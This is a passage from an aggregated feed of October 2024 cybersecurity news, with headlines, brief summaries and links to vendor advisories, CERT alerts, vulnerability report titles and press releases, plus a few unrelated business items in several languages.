attacker to cause the server-side application to make requests to an unintended IP address.CVSS Score: 7.2 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N CWE-918: Server-Side Request Forgery (SSRF) There is no evidence that these vulnerabilities are being exploited in the wild and SonicWall SSL VPN SMA 100 series products are not affected by these vulnerabilities. SonicWall strongly advises SSLVPN SMA 1000 series product and Connect Tunnel client users to upgrade to the mentioned fixed-release version. CVE: CVE-2024-45315, CVE-2024-45316, CVE-2024-45317 Last updated: Oct. 11, 2024, 8:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0017
Graylog Wins ‘SIEM Innovation of the Year’ in 2024 CyberSecurity Breakthrough Awards
2024-10-10T14:15:06Z | 1728569706

Graylog, a leader in Threat Detection, Investigation, and Response (TDIR), today announced it has won CyberSecurity Breakthrough’s ‘SIEM Innovation of the Year’ Award. Graylog’s SIEM solution, Graylog Security, is recognized as an innovative, integrated, and user-friendly security solution that delivers exceptional value.   The post Graylog Wins ‘SIEM Innovation of the Year’ in 2024 CyberSecurity Breakthrough Awards appeared first on Graylog.

https://graylog.org/news/graylog-wins-siem-innovation-of-the-year/
Beyond the Edge: Complementing WAAP with Always-On API Security
2024-10-10T13:00:00Z | 1728565200

Learn best practices for API security ? and explore why WAAP on its own isn?t enough

https://www.akamai.com/blog/security/2024/oct/beyond-edge-complementing-waap-always-on-api-security
How Americaneagle.com Thwarted a Massive DNS DDoS Attack with Akamai Shield NS53
2024-10-10T13:00:00Z | 1728565200

https://www.akamai.com/blog/security/2024/oct/american-eagle-thwarted-massive-dns-ddos-attack
Aryaka Taps Chris Ranalli as CRO to Drive Rapid Growth of Unified SASE as a Service
2024-10-10T12:09:11Z | 1728562151

SANTA CLARA, CA – October 10, 2024 —Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced the appointment of Chris Ranalli as Chief Revenue Officer (CRO). With 25 years of experience in security, enterprise software, and networking, Chris brings a wealth of deep domain expertise to Aryaka’s leadership team. In... The post Aryaka Taps Chris Ranalli as CRO to Drive Rapid Growth of Unified SASE as a Service appeared first on Aryaka.

https://www.aryaka.com/press/chris-ranalli-cro-announcement/
M-valimiste tehniline prototüüp on valmis
2024-10-10T10:27:07Z | 1728556027

Riigi Infosüsteemi Amet (RIA) on Riigi valimisteenistuse tehniline ja innovatsioonipartner, kes lisaks valimiste infosüsteemi arendamisele ja e-hääletuse süsteemi käitamisele vastutab ka m-hääletuse rakenduse arendamise eest. RIA üks prioriteeteesmärk on olnud mobiiliga valimise võimaldamiseks sobiva ja turvalise valimisrakenduse arendamine.

https://ria.ee/uudised/m-valimiste-tehniline-prototuup-valmis
ESG Watch | October 2024
2024-10-10T09:26:33Z | 1728552393

Key news in this edition: Anti-greenwashing guidance from the UK competition regulator. EU Commission proposes delay for landmark anti-deforestation law. Taskforce on Inequality and Social-Related Financial Disclosures (TISFD) launched. editorial   In the last month we have seen the launch of the new Taskforce on Inequality and Social-related Financial Disclosures (TISFD), reflecting the growing corporate priority to address social issues, as well as environmental issues which have historically been more dominant in ESG. By providing guidance on reporting labour and human rights performance, the TISFD will empower companies to improve transparency and attract socially-conscious investors. Similarly, the IFRS Foundation's new guide encourages organisations to adopt the International Sustainability Standards Board (ISSB) framework voluntarily, responding to rising investor demand for transparency in sustainability reporting. Meanwhile, on the regulatory front, the UK’s Competition and Markets Authority (CMA) is stepping up scrutiny on greenwashing, providing guidance to ensure accurate environmental claims in the fashion industry, with potential penalties for non-compliance. Other sectors can expect to face this level of scrutiny next. In a contrasting move, the European Commission's proposed delay of the Deforestation Regulation (EUDR) raises questions about commitment to environmental protections. Initially set for implementation in 2023, the extension to December 2025 provides companies more time for compliance but could undermine urgent climate action and won’t address some of the fundamental concerns businesses have with the regulation.

https://www.s-rminform.com/esg-watch/esg-watch-october-2024
ZTNA Face-Off: Traditional vs. Universal – Unveiling the Key Differences
2024-10-10T08:57:47Z | 1728550667

Introduction  In the ever-evolving cybersecurity landscape, the debate between Universal ZTNA and Traditional ZTNA is heating up. While Traditional ZTNA has been a cornerstone for secure access, Universal ZTNA is redefining the game with its comprehensive, adaptive approach. Imagine a security solution that fortifies your network and seamlessly integrates with any environment, providing unparalleled protection... The post ZTNA Face-Off: Traditional vs. Universal – Unveiling the Key Differences  appeared first on Cato Networks.

https://www.catonetworks.com/blog/ztna-face-off-traditional-vs-universal/
RIA koolitas õpetajaid küberturvalisuse teemadel
2024-10-10T08:43:51Z | 1728549831

Septembris ja oktoobris toimus Riigi Infosüsteemi Ameti (RIA) tellimusel kolm praktilist küberturbe koolitust arvutiõpetuse ja informaatika õpetajatele.

https://ria.ee/uudised/ria-koolitas-opetajaid-kuberturvalisuse-teemadel
High Threat Security Alert (A24-10-09): Vulnerability in Firefox
2024-10-10T04:00:00Z | 1728532800

Mozilla has published an advisory (MFSA2024-51) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-10-10): Multiple Vulnerabilities in Palo Alto Networks Expedition
2024-10-10T04:00:00Z | 1728532800

Palo Alto Networks has published a security advisory to address multiple vulnerabilities in Expedition.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-11): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-10-10T04:00:00Z | 1728532800

Apple has released iOS 18.0.1 and iPadOS 18.0.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-12): Vulnerability in Ivanti Products
2024-10-10T04:00:00Z | 1728532800

Ivanti has released a security advisory to address a vulnerability in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-13): Multiple Vulnerabilities in Juniper Networks Products
2024-10-10T04:00:00Z | 1728532800

Juniper Networks has published security advisories to address multiple vulnerabilities in Junos OS, Junos OS Evolved and Junos Space.

https://www.govcert.gov.hk/en/alerts_detail.php
RSAC/Blackhat booths don’t have to suck
2024-10-09T13:20:33Z | 1728480033

Cheap tchotchke, pushy salespeople and silly gimmicks. Vendor booths are often considered horrible wastes of time (and money). But we think they are great and keep recommending them to friends. It’s not because we throw money around either. We never raised capital, so even though we crossed $19m in ARR last year, we still watch our marketing spend judiciously. We don’t do airport ads and we don’t pay fancy analyst firms. (In fact, we still don’t do any outbound sales). But.. our booths have gotten steadily better and we show up religiously at about 5 shows every year. A few years back we wrote a post on running our first RSAC booth. We detailed all the costs involved, and though we’re a bunch of cynical, bootstrapped, technical founders, we reached the counter-intuitive conclusion that the booth actually worked out well for us. As a follow-up to that post, I wanted to share lessons we’ve learned since then. We’ve strongly recommended booths to other security startups, with somewhat mixed results. This post explains what (we think) makes booths win for us (with some do’s and don’ts for friends). Do: Meet your customers As obvious as it sounds, the booth as a […]

https://blog.thinkst.com/2024/10/rsac-blackhat-booths-dont-have-to-suck.html
Strengthening DOD Cybersecurity: The Journey to Zero Trust by 2027
2024-10-09T13:00:00Z | 1728478800

https://www.akamai.com/blog/security/2024/aug/strengthening-dod-cybersecurity-the-journey-to-zero-trust-by-2027
Cato CTRL Threat Research: ProKYC – Deepfake Tool for Account Fraud Attacks
2024-10-09T12:25:00Z | 1728476700

Executive Summary  Cato CTRL security researchers have recently discovered ProKYC, a deepfake tool in the cybercriminal underground that helps threat actors beat two-factor authentication (2FA) for conducting account fraud attacks.   The tool being sold is customized to target cryptocurrency exchanges—specifically ones that authenticate new users leveraging a government-issued document and by enabling the computer’s... The post Cato CTRL Threat Research: ProKYC – Deepfake Tool for Account Fraud Attacks appeared first on Cato Networks.

https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. október
2024-10-09T10:26:37Z | 1728469597

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt. A Microsoft 2024. október havi biztonsági csomagjában összesen 117 különböző biztonsági hibát javított, köztük 5 nulladik napi (zero-day) sebezhetőséget is: CVE-2024-43573 – Windows MSHTML […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-oktober/
High Threat Security Alert (A24-10-07): Multiple Vulnerabilities in Microsoft Products (October 2024)
2024-10-09T04:00:00Z | 1728446400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-08): Multiple Vulnerabilities in Google Chrome
2024-10-09T04:00:00Z | 1728446400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Protecting Democracy From The Growing Threat of Deepfakes and Disinformation
2024-10-09T00:00:00Z | 1728432000

Deepfakes and disinformation campaigns are reshaping the election cybersecurity landscape, threatening the integrity of democratic processes. This final part of our series explores how AI-driven tools spread false narratives, erode trust, and increase polarization, while outlining the urgent need for public awareness, media literacy, and collaborative defense strategies to safeguard democracy in the digital age.

https://www.greynoise.io/blog/protecting-democracy-from-the-growing-threat-of-deepfakes-and-disinformation
Patchetirsdag oktober 2024
2024-10-08T19:41:34Z | 1728416494

Microsoft har offentliggjort de månedlige sikkerhetsoppdateringene sine. Det er totalt 120 sårbarheter i oktober. Tre sårbarheter er vurdert som kritiske.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/patchetirsdag-oktober-2024
Introducing Hillstone’s New NIPS Models: Addressing Enterprise Security Challenges with Scalable Solutions
2024-10-08T15:46:01Z | 1728402361

The post Introducing Hillstone’s New NIPS Models: Addressing Enterprise Security Challenges with Scalable Solutions appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/introducing-hillstones-new-nips-models-addressing-enterprise-security-challenges-with-scalable-solutions/
How to Use ITSM, SIEM, and SOAR to Remediate API Attacks
2024-10-08T13:00:00Z | 1728392400

https://www.akamai.com/blog/security/2024/oct/how-to-use-itsm-siem-and-soar-to-remediate-api-attacks
Emerging Threat_Stealer Malware (Lumma C2) Campaign with fake CAPTCHA pages
2024-10-08T11:45:57Z | 1728387957

The Cyber Threat Intelligence (CTI) Unit at BGD e-GOV CIRT has recently identified a stealer malware campaign linked to the notorious Lumma Stealer malware family. Further investigation has revealed that multiple variants of stealer malware are being distributed using similar tactics. This report details how our threat intelligence researchers detected and analyzed this evolving malware campaign. Our CTI Unit has been actively monitoring stealer malware... Read More

https://www.cirt.gov.bd/malware-lumma-c2-fake-captcha/
Aryaka Fall ’24 Update Adds Cloud Access Security Broker and Remote Browser Isolation Integration to Unified SASE as a Service, Accelerating Customer Value Delivery
2024-10-08T11:42:00Z | 1728387720

SANTA CLARA, CA – October 8, 2024 —Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced its Fall ’24 product update expanding its Aryaka Unified SASE as a Service offering. The update includes Aryaka’s new Cloud Access Security Broker (CASB) and validated interoperability with Menlo Security, the pioneer in Secure... The post Aryaka Fall ’24 Update Adds Cloud Access Security Broker and Remote Browser Isolation Integration to Unified SASE as a Service, Accelerating Customer Value Delivery appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-fall-2024-update-expands-unified-sase/
Cyber Weather 2024
2024-10-08T11:31:01Z | 1728387061

As in June and July, the Cyber weather in August continued being calmer than usual.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_08/2024
Cyber Weather 2024
2024-10-08T11:31:01Z | 1728387061

As in June and July, the Cyber weather in August continued being calmer than usual.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_08/2024
Cato Networks Wins 2024 Vendor Net Promoter Score Award from AVANT
2024-10-08T09:03:17Z | 1728378197

At the 2024 AVANT Special Forces Summit in Phoenix in September, Cato Networks won the 2024 Vendor Net Promoter Score Award. AVANT is a technology services distributor (TSD) based in Chicago and a Cato partner.   Cato was recognized for achieving a net promoter score (NPS) of 93 across two categories:   An NPS score measures how... The post Cato Networks Wins 2024 Vendor Net Promoter Score Award from AVANT appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-wins-2024-vendor-net-promoter-score-award/
Security Alert (A24-10-06): Multiple Vulnerabilities in Android
2024-10-08T04:00:00Z | 1728360000

Google has released Android Security Bulletin October 2024 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Achieving DORA Compliance: Best Practices for Securing Data in Transit
2024-10-07T14:16:14Z | 1728310574

Among the many aspects of digital resilience that DORA addresses, protecting data in transit plays a critical role in ensuring compliance with this regulation. In this blog post, we will explore why safeguarding data in transit is essential under DORA and how it helps businesses meet compliance requirements while protecting sensitive financial information. The post Achieving DORA Compliance: Best Practices for Securing Data in Transit appeared first on Certes.

https://certes.ai/2024/10/07/achieving-dora-compliance/
Why Protecting Data in Transit Should Be Your Top Priority – Not Just Monitoring Network Activity
2024-10-07T14:12:16Z | 1728310336

While monitoring data is important, it’s not enough on its own. One of the most overlooked but critical aspects of security is protecting data in transit — the data that moves between devices, networks, or cloud services. In this blog post, we’ll explain why focusing on securing data in transit is essential and how it can protect your business from sophisticated cyber threats. The post Why Protecting Data in Transit Should Be Your Top Priority – Not Just Monitoring Network Activity appeared first on Certes.

https://certes.ai/2024/10/07/protecting-data-in-transit/
RIA uuendas ID-tarkvara versiooni ja kohandas rakenduse DigiDoc4 nimetust
2024-10-07T08:52:19Z | 1728291139

Riigi Infosüsteemi Amet (RIA) avaldas täna, 7. oktoobril ID-tarkvara uue versiooni 2024.9, milles muude uuenduste seas muudeti ka rakenduse DigiDoc4 nimetust ja peamist digiallkirjastamise teeki.

https://ria.ee/uudised/ria-uuendas-id-tarkvara-versiooni-ja-kohandas-rakenduse-digidoc4-nimetust
SASE: The Journey from Revolution to Evolution
2024-10-07T08:48:19Z | 1728290899

I’ve always been captivated by technological revolutions. There’s something exhilarating about witnessing a paradigm shift, a moment when the world is fundamentally altered by innovation. I remember the first time I held an iPhone, realizing that it wasn’t just another phone—it was a device that would redefine communication, connectivity, and even society itself. Similarly, when... The post SASE: The Journey from Revolution to Evolution appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-journey-from-revolution-to-evolution/
Security Alert (A24-10-05): Multiple Vulnerabilities in Microsoft Edge
2024-10-07T04:00:00Z | 1728273600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Centro Nacional de Cibersegurança parceiro da PJ no Jogo Rayuela
2024-10-07T00:00:00Z | 1728259200

O jogo Rayuela foi divulgado no dia 3 de outubro, na sede da Polícia Judiciária, inserido na iniciativa “Missão Cibersegura”, que assinala o mês europeu da cibersegurança. O objetivo do jogo online dirigido a crianças e jovens dos 10 aos 16 anos, é, de uma forma lúdica e interativa, contribuir para que os jovens melhor saibam lidar com o domínio digital.O Centro Nacional de Cibersegurança e o Centro Internet Segura associam-se, também, a esta missão, que é a sua, de promover a literacia digital e o bem-estar digital dos jovens.O Rayuela integra seis ciberaventuras: ciberbullying, aliciamento online, discurso de ódio, riscos tecnológicos, relações toxicas online e fake news, que promovem comportamentos online responsáveis e pretendem reforçar a privacidade e segurança digital. O objetivo é levar os jogadores a aprender com as suas decisões durante o jogo.O jogo, financiado pela União Europeia, foi desenvolvido por especialistas de várias áreas, sendo a Polícia Judiciária representante de Portugal no consórcio europeu. Já foi testado com mais de 100 crianças, com resultados considerados positivos.A Polícia Judiciária insere o jogo Rayuela, na sua missão de prevenção da cibercrimalidade, contando com o apoio da Direção-Geral da Educação, membro do consórcio do Centro Internet Segura, para a divulgação e recomendação de aplicação do jogo junto dos agrupamentos de escolas e todo o país.

https://dyn.cncs.gov.pt/pt/detalhe/art/135891/centro-nacional-de-ciberseguranca-parceiro-da-pj-no-jogo-rayuela
Presidência da República concede Alto Patrocínio ao Cybersecurity Challenge.PT
2024-10-06T00:00:00Z | 1728172800

Sua Excelência o Presidente da República concedeu o seu Alto Patrocínio ao Cybersecurity Challenge PT, iniciativa que seleciona a Team Portugal, constituída por 10 jovens talentos em cibersegurança, que vai representar o nosso país no European Cybersecurity Challenge 2024 (ECSC 2024), a maior competição da Europa na área da cibersegurança, que decorre entre 7 a 11 de outubro, na cidade italiana de Turim, onde se vão juntar os melhores talentos de 40 países, 31 europeus e 9 de outros continentes. A equipa Team Portugal, constituída por estudantes do ensino secundário e superior, com idades entre os 16 aos 25 anos, oriundos de várias regiões do nosso país, vai participar no ECSC 2024, acompanhada e treinada por dois treinadores e vários especialistas nacionais e internacionais da área da cibersegurança. A missão é representar Portugal e, durante três dias cooperar entre si para resolver o maior número de desafios relacionados com a segurança informática em vários domínios: desde provas de ataque e defesa,  segurança web, segurança móvel, hardware, criptografia, engenharia reversa ou análise forense, para alcançar a melhor posição possível na competição, organizada pela Agenzia per la Cybersicurezza Nazionale, pelo CINI Cybersecurity National Lab, com o apoio da Agência Europeia para a Segurança das Redes e da Informação (ENISA).Para além da competição europeia decorre, anualmente, uma competição mundial, o International Cybersecurity Challenge, na qual o continente europeu participa com uma equipa composta pelos 15 melhores talentos europeus - a Team Europe, selecionados através de várias provas de qualificação organizadas pela ENISA. Este ano, a Team Europe conta, pela primeira vez, com a participação de um elemento português feminino, Mariana Costa, de 20 anos, um dos mais jovens participantes da equipa desde o início desta competição mundial, que vai decorrer de 28 de outubro a 1 de novembro, na cidade de Santiago, Chile. De referir que o treinador principal da Team Europe 2024 também é português,Pedro Adão, professor do Instituto Superior Técnico, simultaneamente treinador da Team Portugal. Nesta seleção europeia, que vai já na terceira edição, Portugal tem mantido uma presença assídua, pela capacidade dos seus talentos nacionais nas intensas provas de qualificação. A Team Europe, ganhou as 2 primeiras edições do International Cybersecurity Challenge.O ECSC decorre no Mês Europeu da Cibersegurança, iniciativa anual celebrada na União Europeia à qual o Centro Nacional de Cibersegurança se associa, que promove nos Estados Membros a cibersegurança entre cidadãos e organizações. 

https://dyn.cncs.gov.pt/pt/detalhe/art/135890/presidencia-da-republica-concede-alto-patrocinio-ao-cybersecurity-challengept
Eesti on ÜRO digiriigi teenuste edetabelis teisel kohal
2024-10-05T08:00:20Z | 1728115220

Värske uuring näitab, et Eestis on ÜRO liikmesriikidest paremuselt teised riigi e-teenused, edetabelis on esikohal Taani, Eestile järgneb kolmandana Singapur.

https://ria.ee/uudised/eesti-uro-digiriigi-teenuste-edetabelis-teisel-kohal
Akamai: Supporting Chinese Enterprises in Global Expansion
2024-10-04T13:00:00Z | 1728046800

China is a cornerstone of Akamai?s operations and we view ourselves as partners with Chinese businesses as they navigate the complexities of a global economy.

https://www.akamai.com/blog/news/2025/jan/akamai-supporting-chinese-enterprises-global-expansion
September küberruumis: inimesed kaotasid õngitsuste tõttu kümneid tuhandeid eurosid
2024-10-04T08:42:44Z | 1728031364

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et paljud inimesed kaotasid septembris suuri rahasummasid LHV panga nime kuritarvitades saadetud õngitsuskirjaga ning mitmeid olulisi e-teenuseid tabasid katkestused.

https://ria.ee/uudised/september-kuberruumis-inimesed-kaotasid-ongitsuste-tottu-kumneid-tuhandeid-eurosid
FIRST POST: Jul-Sep 2024
2024-10-04T00:00:00Z | 1728000000

Message from the Chair; Board members Roles and Responsibilities for 2024/2025; FIRST-AJCCBC Workshop Series – Summer 2024; First NETSEC training in Fukuoka; Looking back at the Fukuoka Annual Conference; Training on Fundamentals of Cyber Threat Intelligence successfully delivered at the International Information Technology University (IITU), Almaty, Kazakhstan; FIRST at the Summer School on Internet Governance in Meissen; Special Interest Group Updates; FIRST Newcomers & Membership Committee; IMPORTANT: Heads-Up on VAT for FIRST for all events in EUROPE from 2025 onward; FIRST Gains Momentum in Media Landscape; Upcoming Events; FIRST on Social Media

https://www.first.org/newsroom/post/202409
Security alert CVE-2024-20439: Stormshield Products Response
2024-10-03T15:00:01Z | 1727967601

A new critical unauthorized access vulnerability impacting has been reported. It has been assigned the reference CVE-2024-20439 and a CVSS 3.1 score of 9.8. The Stormshield Customer Security Lab details our protection offerings. This flaw impacts the following version of the application: 0.0 1.0 2.0... The post Security alert CVE-2024-20439: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2024-20439-stormshield-products-response/
Why Fuzzing Isn?t Enough to Test Your APIs for Security Issues
2024-10-03T13:00:00Z | 1727960400

Learn about API testing best practices and find out why fuzzing has limitations for enterprises that need API security.

https://www.akamai.com/blog/security/2024/oct/why-fuzzing-isnt-enough-to-test-your-apis-for-security-issues
Celebrating eight years of being the NCSC – a part of GCHQ
2024-10-03T07:28:41Z | 1727940521

As Felicity Oswald hands over to the new NCSC CEO, she reflects on why cyber security and intelligence are so connected.

https://www.ncsc.gov.uk/blog-post/celebrating-eight-years-being-the-ncsc-part-of-gchq
Security Alert (A24-10-03): Multiple Vulnerabilities in Google Chrome
2024-10-03T04:00:00Z | 1727928000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-04): Multiple Vulnerabilities in Cisco Products
2024-10-03T04:00:00Z | 1727928000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Veertu Anka Build registry log files directory traversal vulnerability
2024-10-03T00:00:00Z | 1727913600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2061
GNOME Project G Structured File Library (libgsf) Compound Document Binary File Directory integer overflow vulnerability
2024-10-03T00:00:00Z | 1727913600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2068
Veertu Anka Build node agent update privilege escalation vulnerability
2024-10-03T00:00:00Z | 1727913600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2060
Veertu Anka Build registry archive files directory traversal vulnerability
2024-10-03T00:00:00Z | 1727913600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2059
GNOME Project G Structured File Library (libgsf) Compound Document Binary File Sector Allocation Table integer overflow vulnerability
2024-10-03T00:00:00Z | 1727913600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2069
Now Playing: 2024 State of Threat Detection and Response by Jesse Kimbrel
2024-10-03T00:00:00Z | 1727913600

Explore key insights from the 2024 State of Threat Detection and Response report, highlighting defender challenges, AI adoption, and the vendor disconnect.

https://www.vectra.ai/blog/now-playing-2024-state-of-threat-detection-and-response
Advancing Federal Cybersecurity With Zero Trust Principles
2024-10-02T13:00:00Z | 1727874000

https://www.akamai.com/blog/security/2024/oct/advancing-federal-cybersecurity-with-zero-trust-principles
Political Manipulation with Massive AI Model-driven Misinformation and Microtargeting
2024-10-02T10:00:49Z | 1727863249

Applying generative AI, bad actors could tailor disinformation campaigns to affect election outcomes on a massive scale with relatively little effort.

https://news.sophos.com/en-us/2024/10/02/political-manipulation-with-massive-ai-model-driven-misinformation-and-microtargeting/
Red Flag Bulletin | October 2024 | Former CEO of Swedbank sentenced for gross fraud
2024-10-02T09:14:28Z | 1727860468

This month’s top stories: Swedish court sentences former CEO of Swedbank to 15 months in prison for gross fraud in making “misleading” comments to the press in 2018; Former governor of Lebanese Central Bank charged with embezzling at least USD 42 million; and Mayor of New York City indicted on charges of bribery, fraud, and violations of campaign finance laws.  Middle east and North Africa  Lebanon: Former Central Bank chief charged with embezzling at least USD 42 million  On 3 September, Riad Salameh, the governor of Lebanon’s Central Bank between 1993 and 2023, was arrested in Beirut and charged with embezzling at least USD 42 million from the Central Bank. The charges reportedly pertain to illicit commissions earned by Salameh between 2015-2018 in an agreement between the Bank and Optimum Invest, a Lebanese brokerage and financial services company. Salameh pleaded not guilty on 9 September. Salameh is also the subject of an Interpol red notice, and is sanctioned by the UK, US, and Canada. Moreover, in 2023, French authorities issued an arrest warrant for Salameh on corruption charges. US / Lebanon: Hezbollah financier pleads guilty to sanctions evasion On 20 September, Mohammad Ibrahim Bazzi, a financier of the Lebanese Shia Islamist political and militant group Hezbollah, pleaded guilty to sanctions evasion and money-laundering conspiracy charges. The charges related to his transfers of hundreds of thousands of US dollars from the US to Lebanon in violation of sanctions imposed on him. Bazzi has been classified as a Specially Designated Global Terrorist by the US Department of the Treasury since May 2018 owing to his involvement in providing financial, material, and technological support to Hezbollah. Bazzi also agreed to forfeit c. USD 830,000 linked to the illegal transactions in question. He faces a maximum 20-year prison sentence.

https://www.s-rminform.com/red-flag-bulletin/october-2024
High Threat Security Alert (A24-10-01): Vulnerability in Juniper Networks Junos OS and Junos OS Evolved
2024-10-02T04:00:00Z | 1727841600

Juniper Networks has published security advisory to address a vulnerability in Junos OS and Junos OS Evolved.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-02): Multiple Vulnerabilities in Firefox
2024-10-02T04:00:00Z | 1727841600

Mozilla has published the advisories (MFSA2024-46, MFSA2024-47 and MFSA2024-48) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit Reader checkbox Calculate use-after-free vulnerability
2024-10-02T00:00:00Z | 1727827200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1967
Halberd: The Open-Source Tool Democratizing Multi-Cloud Security Testing by Arpan Sarkar
2024-10-02T00:00:00Z | 1727827200

Introducing Halberd—the open-source tool democratizing cloud security testing. Empower your team to efficiently assess multiple cloud platforms.

https://www.vectra.ai/blog/halberd-the-open-source-tool-democratizing-multi-cloud-security-testing
SophosAI at Virus Bulletin ’24: Using multimodal AI as a “sixth sense” for cyber defense
2024-10-01T16:49:13Z | 1727801353

Sophos' Younghoo Lee will present his research on the use of AI to analyze both text and image data to classify spam, phishing, and unsafe web content in Dublin.

https://news.sophos.com/en-us/2024/10/01/sophos-ai-at-virus-bulletin-24-using-multimodal-ai-as-a-sixth-sense-for-cyber-defense/
CVE-2024-45367
2024-10-01T14:57:00Z | 1727794620

CWE-1390 WEAK AUTHENTICATION: The web server for ONS-S8 - Spectra Aggregation Switch includes an incomplete authentication process, which can lead to an attacker authenticating without a password. Optigo Networks recommends users always use a unique management VLAN for the port on the ONS-S8 that is used to connect to OneView. Optigo Networks also recommends users implement at least one of the following additional mitigations: Use a dedicated NIC on the BMS computer and exclusively this computer for connecting to OneView to manage your OT network configuration. Set up a router firewall with a white list for the devices permitted to access OneView. Connect to OneView via secure VPN.

https://claroty.com/team82/disclosure-dashboard/cve-2024-45367
CVE-2024-41925
2024-10-01T14:56:00Z | 1727794560

CWE-98: IMPROPER CONTROL OF FILENAME FOR INCLUDE/REQUIRE STATEMENT IN PHP PROGRAM ('PHP REMOTE FILE INCLUSION') The web service for ONS-S8 - Spectra Aggregation Switch includes functions which do not properly validate user input, allowing an attacker to traverse directories, bypass authentication, and execute remote code. ONS-S8 - Spectra Aggregation Switch: 1.3.7 and prior are affected. Optigo Networks recommends users always use a unique management VLAN for the port on the ONS-S8 that is used to connect to OneView. Optigo Networks also recommends users implement at least one of the following additional mitigations: Use a dedicated NIC on the BMS computer and exclusively this computer for connecting to OneView to manage your OT network configuration. Set up a router firewall with a white list for the devices permitted to access OneView. Connect to OneView via secure VPN.

https://claroty.com/team82/disclosure-dashboard/cve-2024-41925
Securing the software supply chain with the SLSA framework
2024-10-01T13:00:58Z | 1727787658

Software supply chain security has been a hot topic since the Solarwinds breach back in 2020. Thanks to the Supply-chain Levels for Software Artifacts (SLSA) framework, the software industry is now at the threshold of sustainably solving many of the biggest challenges in securely building and distributing open-source software. SLSA is a […]

https://blog.trailofbits.com/2024/10/01/securing-the-software-supply-chain-with-the-slsa-framework/
Introducing an Effortless Way to Deploy Akamai API Security
2024-10-01T13:00:00Z | 1727787600

https://www.akamai.com/blog/security/2024/oct/introducing-effortless-way-deploy-akamai-api-security
The Dark Knight Returns: Joker malware analysis
2024-10-01T11:00:00Z | 1727780400

CERT Polska has recently observed new samples of the “Joker” mobile malware. The applications are present in the Google Play Store and target Polish users, among others.

https://cert.pl/en/posts/2024/10/analiza-joker/
When CUPS Runneth Over: The Threat of DDoS
2024-10-01T11:00:00Z | 1727780400

https://www.akamai.com/blog/security-research/2024/oct/october-cups-ddos-threat
Eesti valimiste tehnoloogias ei tuvastatud kõrgeid turvariske
2024-10-01T07:36:13Z | 1727768173

Eesti Teaduste Akadeemia küberturvalisuse komisjon hindas koostöös valimisi korraldavate riigiasutustega Eesti hääletustehnoloogiate turvalisust. Kaardistatud 31 ohu seas ei hinnatud ühtegi kõrgeks või väga kõrgeks. Keskmise riskiastmega hinnati kuut võimalikku ohtu, mida analüüsiti koos kasutusel olevate ja soovitavate turvameetmetega. Ülejäänud 25 riski hinnati madalaks.

https://ria.ee/uudised/eesti-valimiste-tehnoloogias-ei-tuvastatud-korgeid-turvariske
ZTNA: A Game-Changer for C-Level Executives
2024-10-01T07:04:22Z | 1727766262

In today’s digital age, where work from anywhere and hybrid cloud adoption are the norm, traditional network security perimeters have crumbled. IT organizations are using hybrid cloud strategies to combine the scalable, cost-effective public cloud with the secure, compliant private cloud. However, on the user side, enterprises are grappling with the limitations of VPNs, which... The post ZTNA: A Game-Changer for C-Level Executives  appeared first on Cato Networks.

https://www.catonetworks.com/blog/ztna-game-changer-for-c-level-executives/
Mortgage Approvals for House Purchases Highest since August 2022
2024-09-30T14:04:50Z | 1727705090

